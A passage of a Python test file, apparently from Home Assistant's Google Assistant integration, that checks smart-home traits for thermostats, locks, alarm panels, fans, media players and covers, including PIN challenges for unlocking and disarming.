ATTR_SUPPORTED_FEATURES: climate.SUPPORT_TARGET_TEMPERATURE_RANGE,
climate.ATTR_HVAC_MODES: [
climate.HVAC_MODE_OFF,
climate.HVAC_MODE_COOL,
climate.HVAC_MODE_HEAT,
climate.HVAC_MODE_HEAT_COOL,
],
climate.ATTR_MIN_TEMP: None,
climate.ATTR_MAX_TEMP: None,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"availableThermostatModes": "off,cool,heat,heatcool,on",
"thermostatTemperatureUnit": "F",
}
assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
calls = async_mock_service(hass, climate.DOMAIN, SERVICE_TURN_ON)
await trt.execute(
trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "on"}, {}
)
assert len(calls) == 1
calls = async_mock_service(hass, climate.DOMAIN, SERVICE_TURN_OFF)
await trt.execute(
trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "off"}, {}
)
assert len(calls) == 1
async def test_temperature_setting_climate_range(hass):
"""Test TemperatureSetting trait support for climate domain - range."""
assert helpers.get_google_type(climate.DOMAIN, None) is not None
assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
hass.config.units.temperature_unit = TEMP_FAHRENHEIT
trt = trait.TemperatureSettingTrait(
hass,
State(
"climate.bla",
climate.HVAC_MODE_AUTO,
{
climate.ATTR_CURRENT_TEMPERATURE: 70,
climate.ATTR_CURRENT_HUMIDITY: 25,
ATTR_SUPPORTED_FEATURES: climate.SUPPORT_TARGET_TEMPERATURE_RANGE,
climate.ATTR_HVAC_MODES: [
STATE_OFF,
climate.HVAC_MODE_COOL,
climate.HVAC_MODE_HEAT,
climate.HVAC_MODE_AUTO,
],
climate.ATTR_TARGET_TEMP_HIGH: 75,
climate.ATTR_TARGET_TEMP_LOW: 65,
climate.ATTR_MIN_TEMP: 50,
climate.ATTR_MAX_TEMP: 80,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"availableThermostatModes": "off,cool,heat,auto,on",
"thermostatTemperatureUnit": "F",
}
assert trt.query_attributes() == {
"thermostatMode": "auto",
"thermostatTemperatureAmbient": 21.1,
"thermostatHumidityAmbient": 25,
"thermostatTemperatureSetpointLow": 18.3,
"thermostatTemperatureSetpointHigh": 23.9,
}
assert trt.can_execute(trait.COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE, {})
assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
await trt.execute(
trait.COMMAND_THERMOSTAT_TEMPERATURE_SET_RANGE,
BASIC_DATA,
{
"thermostatTemperatureSetpointHigh": 25,
"thermostatTemperatureSetpointLow": 20,
},
{},
)
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "climate.bla",
climate.ATTR_TARGET_TEMP_HIGH: 77,
climate.ATTR_TARGET_TEMP_LOW: 68,
}
calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_HVAC_MODE)
await trt.execute(
trait.COMMAND_THERMOSTAT_SET_MODE, BASIC_DATA, {"thermostatMode": "cool"}, {}
)
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "climate.bla",
climate.ATTR_HVAC_MODE: climate.HVAC_MODE_COOL,
}
with pytest.raises(helpers.SmartHomeError) as err:
await trt.execute(
trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
BASIC_DATA,
{"thermostatTemperatureSetpoint": -100},
{},
)
assert err.value.code == const.ERR_VALUE_OUT_OF_RANGE
hass.config.units.temperature_unit = TEMP_CELSIUS
async def test_temperature_setting_climate_setpoint(hass):
"""Test TemperatureSetting trait support for climate domain - setpoint."""
assert helpers.get_google_type(climate.DOMAIN, None) is not None
assert trait.TemperatureSettingTrait.supported(climate.DOMAIN, 0, None)
hass.config.units.temperature_unit = TEMP_CELSIUS
trt = trait.TemperatureSettingTrait(
hass,
State(
"climate.bla",
climate.HVAC_MODE_COOL,
{
climate.ATTR_HVAC_MODES: [STATE_OFF, climate.HVAC_MODE_COOL],
climate.ATTR_MIN_TEMP: 10,
climate.ATTR_MAX_TEMP: 30,
ATTR_TEMPERATURE: 18,
climate.ATTR_CURRENT_TEMPERATURE: 20,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"availableThermostatModes": "off,cool,on",
"thermostatTemperatureUnit": "C",
}
assert trt.query_attributes() == {
"thermostatMode": "cool",
"thermostatTemperatureAmbient": 20,
"thermostatTemperatureSetpoint": 18,
}
assert trt.can_execute(trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT, {})
assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
with pytest.raises(helpers.SmartHomeError):
await trt.execute(
trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
BASIC_DATA,
{"thermostatTemperatureSetpoint": -100},
{},
)
await trt.execute(
trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
BASIC_DATA,
{"thermostatTemperatureSetpoint": 19},
{},
)
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "climate.bla", ATTR_TEMPERATURE: 19}
async def test_temperature_setting_climate_setpoint_auto(hass):
"""
Test TemperatureSetting trait support for climate domain.
Setpoint in auto mode.
"""
hass.config.units.temperature_unit = TEMP_CELSIUS
trt = trait.TemperatureSettingTrait(
hass,
State(
"climate.bla",
climate.HVAC_MODE_HEAT_COOL,
{
climate.ATTR_HVAC_MODES: [
climate.HVAC_MODE_OFF,
climate.HVAC_MODE_HEAT_COOL,
],
climate.ATTR_MIN_TEMP: 10,
climate.ATTR_MAX_TEMP: 30,
ATTR_TEMPERATURE: 18,
climate.ATTR_CURRENT_TEMPERATURE: 20,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"availableThermostatModes": "off,heatcool,on",
"thermostatTemperatureUnit": "C",
}
assert trt.query_attributes() == {
"thermostatMode": "heatcool",
"thermostatTemperatureAmbient": 20,
"thermostatTemperatureSetpointHigh": 18,
"thermostatTemperatureSetpointLow": 18,
}
assert trt.can_execute(trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT, {})
assert trt.can_execute(trait.COMMAND_THERMOSTAT_SET_MODE, {})
calls = async_mock_service(hass, climate.DOMAIN, climate.SERVICE_SET_TEMPERATURE)
await trt.execute(
trait.COMMAND_THERMOSTAT_TEMPERATURE_SETPOINT,
BASIC_DATA,
{"thermostatTemperatureSetpoint": 19},
{},
)
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "climate.bla", ATTR_TEMPERATURE: 19}
async def test_lock_unlock_lock(hass):
"""Test LockUnlock trait locking support for lock domain."""
assert helpers.get_google_type(lock.DOMAIN, None) is not None
assert trait.LockUnlockTrait.supported(lock.DOMAIN, lock.SUPPORT_OPEN, None)
assert trait.LockUnlockTrait.might_2fa(lock.DOMAIN, lock.SUPPORT_OPEN, None)
trt = trait.LockUnlockTrait(
hass, State("lock.front_door", lock.STATE_LOCKED), PIN_CONFIG
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"isLocked": True}
assert trt.can_execute(trait.COMMAND_LOCKUNLOCK, {"lock": True})
calls = async_mock_service(hass, lock.DOMAIN, lock.SERVICE_LOCK)
await trt.execute(trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": True}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "lock.front_door"}
async def test_lock_unlock_unlock(hass):
"""Test LockUnlock trait unlocking support for lock domain."""
assert helpers.get_google_type(lock.DOMAIN, None) is not None
assert trait.LockUnlockTrait.supported(lock.DOMAIN, lock.SUPPORT_OPEN, None)
trt = trait.LockUnlockTrait(
hass, State("lock.front_door", lock.STATE_LOCKED), PIN_CONFIG
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"isLocked": True}
assert trt.can_execute(trait.COMMAND_LOCKUNLOCK, {"lock": False})
calls = async_mock_service(hass, lock.DOMAIN, lock.SERVICE_UNLOCK)
# No challenge data
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {})
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
# invalid pin
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(
trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {"pin": 9999}
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
await trt.execute(
trait.COMMAND_LOCKUNLOCK, PIN_DATA, {"lock": False}, {"pin": "1234"}
)
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "lock.front_door"}
# Test without pin
trt = trait.LockUnlockTrait(
hass, State("lock.front_door", lock.STATE_LOCKED), BASIC_CONFIG
)
with pytest.raises(error.SmartHomeError) as err:
await trt.execute(trait.COMMAND_LOCKUNLOCK, BASIC_DATA, {"lock": False}, {})
assert len(calls) == 1
assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
# Test with 2FA override
with patch(
"homeassistant.components.google_assistant.helpers"
".AbstractConfig.should_2fa",
return_value=False,
):
await trt.execute(trait.COMMAND_LOCKUNLOCK, BASIC_DATA, {"lock": False}, {})
assert len(calls) == 2
async def test_arm_disarm_arm_away(hass):
"""Test ArmDisarm trait Arming support for alarm_control_panel domain."""
assert helpers.get_google_type(alarm_control_panel.DOMAIN, None) is not None
assert trait.ArmDisArmTrait.supported(alarm_control_panel.DOMAIN, 0, None)
assert trait.ArmDisArmTrait.might_2fa(alarm_control_panel.DOMAIN, 0, None)
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_ARMED_AWAY,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
assert trt.sync_attributes() == {
"availableArmLevels": {
"levels": [
{
"level_name": "armed_home",
"level_values": [
{"level_synonym": ["armed home", "home"], "lang": "en"}
],
},
{
"level_name": "armed_away",
"level_values": [
{"level_synonym": ["armed away", "away"], "lang": "en"}
],
},
{
"level_name": "armed_night",
"level_values": [
{"level_synonym": ["armed night", "night"], "lang": "en"}
],
},
{
"level_name": "armed_custom_bypass",
"level_values": [
{
"level_synonym": ["armed custom bypass", "custom"],
"lang": "en",
}
],
},
{
"level_name": "triggered",
"level_values": [{"level_synonym": ["triggered"], "lang": "en"}],
},
],
"ordered": False,
}
}
assert trt.query_attributes() == {
"isArmed": True,
"currentArmLevel": STATE_ALARM_ARMED_AWAY,
}
assert trt.can_execute(
trait.COMMAND_ARMDISARM, {"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY}
)
calls = async_mock_service(
hass, alarm_control_panel.DOMAIN, alarm_control_panel.SERVICE_ALARM_ARM_AWAY
)
# Test with no secure_pin configured
with pytest.raises(error.SmartHomeError) as err:
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_DISARMED,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
BASIC_CONFIG,
)
await trt.execute(
trait.COMMAND_ARMDISARM,
BASIC_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{},
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_DISARMED,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
# No challenge data
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(
trait.COMMAND_ARMDISARM,
PIN_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{},
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
# invalid pin
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(
trait.COMMAND_ARMDISARM,
PIN_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{"pin": 9999},
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
# correct pin
await trt.execute(
trait.COMMAND_ARMDISARM,
PIN_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{"pin": "1234"},
)
assert len(calls) == 1
# Test already armed
with pytest.raises(error.SmartHomeError) as err:
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_ARMED_AWAY,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
await trt.execute(
trait.COMMAND_ARMDISARM,
PIN_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{},
)
assert len(calls) == 1
assert err.value.code == const.ERR_ALREADY_ARMED
# Test with code_arm_required False
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_DISARMED,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
),
PIN_CONFIG,
)
await trt.execute(
trait.COMMAND_ARMDISARM,
PIN_DATA,
{"arm": True, "armLevel": STATE_ALARM_ARMED_AWAY},
{},
)
assert len(calls) == 2
async def test_arm_disarm_disarm(hass):
"""Test ArmDisarm trait Disarming support for alarm_control_panel domain."""
assert helpers.get_google_type(alarm_control_panel.DOMAIN, None) is not None
assert trait.ArmDisArmTrait.supported(alarm_control_panel.DOMAIN, 0, None)
assert trait.ArmDisArmTrait.might_2fa(alarm_control_panel.DOMAIN, 0, None)
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_DISARMED,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
assert trt.sync_attributes() == {
"availableArmLevels": {
"levels": [
{
"level_name": "armed_home",
"level_values": [
{"level_synonym": ["armed home", "home"], "lang": "en"}
],
},
{
"level_name": "armed_away",
"level_values": [
{"level_synonym": ["armed away", "away"], "lang": "en"}
],
},
{
"level_name": "armed_night",
"level_values": [
{"level_synonym": ["armed night", "night"], "lang": "en"}
],
},
{
"level_name": "armed_custom_bypass",
"level_values": [
{
"level_synonym": ["armed custom bypass", "custom"],
"lang": "en",
}
],
},
{
"level_name": "triggered",
"level_values": [{"level_synonym": ["triggered"], "lang": "en"}],
},
],
"ordered": False,
}
}
assert trt.query_attributes() == {"isArmed": False}
assert trt.can_execute(trait.COMMAND_ARMDISARM, {"arm": False})
calls = async_mock_service(
hass, alarm_control_panel.DOMAIN, alarm_control_panel.SERVICE_ALARM_DISARM
)
# Test without secure_pin configured
with pytest.raises(error.SmartHomeError) as err:
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_ARMED_AWAY,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
BASIC_CONFIG,
)
await trt.execute(trait.COMMAND_ARMDISARM, BASIC_DATA, {"arm": False}, {})
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NOT_SETUP
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_ARMED_AWAY,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
# No challenge data
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {})
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
# invalid pin
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(
trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {"pin": 9999}
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
# correct pin
await trt.execute(
trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {"pin": "1234"}
)
assert len(calls) == 1
# Test already disarmed
with pytest.raises(error.SmartHomeError) as err:
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_DISARMED,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: True},
),
PIN_CONFIG,
)
await trt.execute(trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": False}, {})
assert len(calls) == 1
assert err.value.code == const.ERR_ALREADY_DISARMED
# Cancel arming after already armed will require pin
with pytest.raises(error.SmartHomeError) as err:
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_ARMED_AWAY,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
),
PIN_CONFIG,
)
await trt.execute(
trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": True, "cancel": True}, {}
)
assert len(calls) == 1
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
# Cancel arming while pending to arm doesn't require pin
trt = trait.ArmDisArmTrait(
hass,
State(
"alarm_control_panel.alarm",
STATE_ALARM_PENDING,
{alarm_control_panel.ATTR_CODE_ARM_REQUIRED: False},
),
PIN_CONFIG,
)
await trt.execute(
trait.COMMAND_ARMDISARM, PIN_DATA, {"arm": True, "cancel": True}, {}
)
assert len(calls) == 2
async def test_fan_speed(hass):
"""Test FanSpeed trait speed control support for fan domain."""
assert helpers.get_google_type(fan.DOMAIN, None) is not None
assert trait.FanSpeedTrait.supported(fan.DOMAIN, fan.SUPPORT_SET_SPEED, None)
trt = trait.FanSpeedTrait(
hass,
State(
"fan.living_room_fan",
fan.SPEED_HIGH,
attributes={
"speed_list": [
fan.SPEED_OFF,
fan.SPEED_LOW,
fan.SPEED_MEDIUM,
fan.SPEED_HIGH,
],
"speed": "low",
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {
"availableFanSpeeds": {
"ordered": True,
"speeds": [
{
"speed_name": "off",
"speed_values": [{"speed_synonym": ["stop", "off"], "lang": "en"}],
},
{
"speed_name": "low",
"speed_values": [
{
"speed_synonym": ["slow", "low", "slowest", "lowest"],
"lang": "en",
}
],
},
{
"speed_name": "medium",
"speed_values": [
{"speed_synonym": ["medium", "mid", "middle"], "lang": "en"}
],
},
{
"speed_name": "high",
"speed_values": [
{
"speed_synonym": [
"high",
"max",
"fast",
"highest",
"fastest",
"maximum",
],
"lang": "en",
}
],
},
],
},
"reversible": False,
}
assert trt.query_attributes() == {
"currentFanSpeedSetting": "low",
"on": True,
"online": True,
}
assert trt.can_execute(trait.COMMAND_FANSPEED, params={"fanSpeed": "medium"})
calls = async_mock_service(hass, fan.DOMAIN, fan.SERVICE_SET_SPEED)
await trt.execute(trait.COMMAND_FANSPEED, BASIC_DATA, {"fanSpeed": "medium"}, {})
assert len(calls) == 1
assert calls[0].data == {"entity_id": "fan.living_room_fan", "speed": "medium"}
async def test_modes(hass):
"""Test Mode trait."""
assert helpers.get_google_type(media_player.DOMAIN, None) is not None
assert trait.ModesTrait.supported(
media_player.DOMAIN, media_player.SUPPORT_SELECT_SOURCE, None
)
trt = trait.ModesTrait(
hass,
State(
"media_player.living_room",
media_player.STATE_PLAYING,
attributes={
media_player.ATTR_INPUT_SOURCE_LIST: [
"media",
"game",
"chromecast",
"plex",
],
media_player.ATTR_INPUT_SOURCE: "game",
},
),
BASIC_CONFIG,
)
attribs = trt.sync_attributes()
assert attribs == {
"availableModes": [
{
"name": "input source",
"name_values": [{"name_synonym": ["input source"], "lang": "en"}],
"settings": [
{
"setting_name": "media",
"setting_values": [
{"setting_synonym": ["media", "media mode"], "lang": "en"}
],
},
{
"setting_name": "game",
"setting_values": [
{"setting_synonym": ["game", "game mode"], "lang": "en"}
],
},
{
"setting_name": "chromecast",
"setting_values": [
{"setting_synonym": ["chromecast"], "lang": "en"}
],
},
],
"ordered": False,
}
]
}
assert trt.query_attributes() == {
"currentModeSettings": {"source": "game"},
"on": True,
"online": True,
}
assert trt.can_execute(
trait.COMMAND_MODES,
params={
"updateModeSettings": {
trt.HA_TO_GOOGLE.get(media_player.ATTR_INPUT_SOURCE): "media"
}
},
)
calls = async_mock_service(
hass, media_player.DOMAIN, media_player.SERVICE_SELECT_SOURCE
)
await trt.execute(
trait.COMMAND_MODES,
BASIC_DATA,
{
"updateModeSettings": {
trt.HA_TO_GOOGLE.get(media_player.ATTR_INPUT_SOURCE): "media"
}
},
{},
)
assert len(calls) == 1
assert calls[0].data == {"entity_id": "media_player.living_room", "source": "media"}
async def test_openclose_cover(hass):
"""Test OpenClose trait support for cover domain."""
assert helpers.get_google_type(cover.DOMAIN, None) is not None
assert trait.OpenCloseTrait.supported(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
)
trt = trait.OpenCloseTrait(
hass,
State(
"cover.bla",
cover.STATE_OPEN,
{
cover.ATTR_CURRENT_POSITION: 75,
ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"openPercent": 75}
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 50}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 50}
async def test_openclose_cover_unknown_state(hass):
"""Test OpenClose trait support for cover domain with unknown state."""
assert helpers.get_google_type(cover.DOMAIN, None) is not None
assert trait.OpenCloseTrait.supported(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
)
# No state
trt = trait.OpenCloseTrait(
hass, State("cover.bla", STATE_UNKNOWN, {}), BASIC_CONFIG
)
assert trt.sync_attributes() == {}
with pytest.raises(helpers.SmartHomeError):
trt.query_attributes()
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_OPEN_COVER)
await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 100}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
assert trt.query_attributes() == {"openPercent": 100}
async def test_openclose_cover_assumed_state(hass):
"""Test OpenClose trait support for cover domain."""
assert helpers.get_google_type(cover.DOMAIN, None) is not None
assert trait.OpenCloseTrait.supported(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
)
trt = trait.OpenCloseTrait(
hass,
State(
"cover.bla",
cover.STATE_OPEN,
{
ATTR_ASSUMED_STATE: True,
ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {}
with pytest.raises(helpers.SmartHomeError):
trt.query_attributes()
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 40}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 40}
assert trt.query_attributes() == {"openPercent": 40}
async def test_openclose_cover_no_position(hass):
"""Test OpenClose trait support for cover domain."""
assert helpers.get_google_type(cover.DOMAIN, None) is not None
assert trait.OpenCloseTrait.supported(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, None
)
trt = trait.OpenCloseTrait(
hass, State("cover.bla", cover.STATE_OPEN, {}), BASIC_CONFIG
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"openPercent": 100}
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_CLOSE_COVER)
await trt.execute(trait.COMMAND_OPENCLOSE, BASIC_DATA, {"openPercent": 0}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
@pytest.mark.parametrize(
"device_class", (cover.DEVICE_CLASS_DOOR, cover.DEVICE_CLASS_GARAGE)
)
async def test_openclose_cover_secure(hass, device_class):
"""Test OpenClose trait support for cover domain."""
assert helpers.get_google_type(cover.DOMAIN, device_class) is not None
assert trait.OpenCloseTrait.supported(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, device_class
)
assert trait.OpenCloseTrait.might_2fa(
cover.DOMAIN, cover.SUPPORT_SET_POSITION, device_class
)
trt = trait.OpenCloseTrait(
hass,
State(
"cover.bla",
cover.STATE_OPEN,
{
ATTR_DEVICE_CLASS: device_class,
ATTR_SUPPORTED_FEATURES: cover.SUPPORT_SET_POSITION,
cover.ATTR_CURRENT_POSITION: 75,
},
),
PIN_CONFIG,
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"openPercent": 75}
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_SET_COVER_POSITION)
# No challenge data
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {})
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_PIN_NEEDED
# invalid pin
with pytest.raises(error.ChallengeNeeded) as err:
await trt.execute(
trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {"pin": "9999"}
)
assert len(calls) == 0
assert err.value.code == const.ERR_CHALLENGE_NEEDED
assert err.value.challenge_type == const.CHALLENGE_FAILED_PIN_NEEDED
await trt.execute(
trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 50}, {"pin": "1234"}
)
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla", cover.ATTR_POSITION: 50}
# no challenge on close
calls = async_mock_service(hass, cover.DOMAIN, cover.SERVICE_CLOSE_COVER)
await trt.execute(trait.COMMAND_OPENCLOSE, PIN_DATA, {"openPercent": 0}, {})
assert len(calls) == 1
assert calls[0].data == {ATTR_ENTITY_ID: "cover.bla"}
@pytest.mark.parametrize(
"device_class",
(
binary_sensor.DEVICE_CLASS_DOOR,
binary_sensor.DEVICE_CLASS_GARAGE_DOOR,
binary_sensor.DEVICE_CLASS_LOCK,
binary_sensor.DEVICE_CLASS_OPENING,
binary_sensor.DEVICE_CLASS_WINDOW,
),
)
async def test_openclose_binary_sensor(hass, device_class):
"""Test OpenClose trait support for binary_sensor domain."""
assert helpers.get_google_type(binary_sensor.DOMAIN, device_class) is not None
assert trait.OpenCloseTrait.supported(binary_sensor.DOMAIN, 0, device_class)
trt = trait.OpenCloseTrait(
hass,
State("binary_sensor.test", STATE_ON, {ATTR_DEVICE_CLASS: device_class}),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {"queryOnlyOpenClose": True}
assert trt.query_attributes() == {"openPercent": 100}
trt = trait.OpenCloseTrait(
hass,
State("binary_sensor.test", STATE_OFF, {ATTR_DEVICE_CLASS: device_class}),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {"queryOnlyOpenClose": True}
assert trt.query_attributes() == {"openPercent": 0}
async def test_volume_media_player(hass):
"""Test volume trait support for media player domain."""
assert helpers.get_google_type(media_player.DOMAIN, None) is not None
assert trait.VolumeTrait.supported(
media_player.DOMAIN,
media_player.SUPPORT_VOLUME_SET | media_player.SUPPORT_VOLUME_MUTE,
None,
)
trt = trait.VolumeTrait(
hass,
State(
"media_player.bla",
media_player.STATE_PLAYING,
{
media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.3,
media_player.ATTR_MEDIA_VOLUME_MUTED: False,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"currentVolume": 30, "isMuted": False}
calls = async_mock_service(
hass, media_player.DOMAIN, media_player.SERVICE_VOLUME_SET
)
await trt.execute(trait.COMMAND_SET_VOLUME, BASIC_DATA, {"volumeLevel": 60}, {})
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "media_player.bla",
media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.6,
}
async def test_volume_media_player_relative(hass):
"""Test volume trait support for media player domain."""
trt = trait.VolumeTrait(
hass,
State(
"media_player.bla",
media_player.STATE_PLAYING,
{
media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.3,
media_player.ATTR_MEDIA_VOLUME_MUTED: False,
},
),
BASIC_CONFIG,
)
assert trt.sync_attributes() == {}
assert trt.query_attributes() == {"currentVolume": 30, "isMuted": False}
calls = async_mock_service(
hass, media_player.DOMAIN, media_player.SERVICE_VOLUME_SET
)
await trt.execute(
trait.COMMAND_VOLUME_RELATIVE,
BASIC_DATA,
{"volumeRelativeLevel": 20, "relativeSteps": 2},
{},
)
assert len(calls) == 1
assert calls[0].data == {
ATTR_ENTITY_ID: "media_player.bla",
media_player.ATTR_MEDIA_VOLUME_LEVEL: 0.5,
}
async def test_temperature_setting_sensor(hass):
"""Test TemperatureSetting trait support for temperature sensor."""
assert (
helpers.get_google_type(sensor.DOMAIN, sensor.DEVICE_CLASS_TEMPERATURE)
is not None
)
assert not trait.TemperatureSettingTrait.supported(
sensor.DOMAIN, 0, sensor.DEVICE_CLASS_HUMIDITY
)
assert trait.TemperatureSettingTrait.supported(
sensor.DOMAIN, 0, sensor.DEVICE_CLASS_TEMPERATURE
)
hass.config.units.temperature_unit = TEMP_FAHRENHEIT
trt = trait.TemperatureSettingTrait(
hass,
State(
